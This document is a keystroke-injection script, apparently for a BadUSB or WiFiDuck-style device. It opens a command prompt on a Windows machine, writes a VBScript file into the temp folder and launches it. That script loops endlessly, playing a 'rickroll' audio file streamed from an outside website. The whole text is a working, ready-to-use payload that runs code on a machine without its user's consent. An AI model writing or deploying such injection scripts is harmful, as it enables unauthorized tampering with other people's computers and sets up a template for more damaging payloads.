delay(4000)
layout('us')
typingSpeed(100,50)

delay(4000)
press("GUI r")
delay(200)
type("cmd\n")
delay(500)
type("del %tmp%\\rick.vbs\n")
delay(200)
type("cd %tmp% && copy con rick.vbs\n")
type("While true\n")
type("Dim oPlayer\n")
type("set oPlayer = CreateObject(\"WMPlayer.OCX\")\n")
type("oPlayer.URL = \"https://pixelcoding.nl/download/rickroll.mp3\"\n")
type("oPlayer.controls.play\n")
type("While oPlayer.playState <> 1 ' 1 = Stopped\n")
type("WScript.Sleep 100\n")
type("Wend\n")
type("oPlayer.close\n")
type("Wend\n")
delay(100)
press("CTRL z")
delay(2000)
type("start rick.vbs\n")
type("exit\n")